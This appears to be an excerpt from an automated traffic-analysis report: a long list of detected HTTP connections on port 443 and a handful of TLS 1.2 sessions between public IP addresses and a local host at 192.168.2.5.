Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858

Source: unknown	HTTPS traffic detected: 40.126.32.76:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50143 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50146 version: TLS 1.2
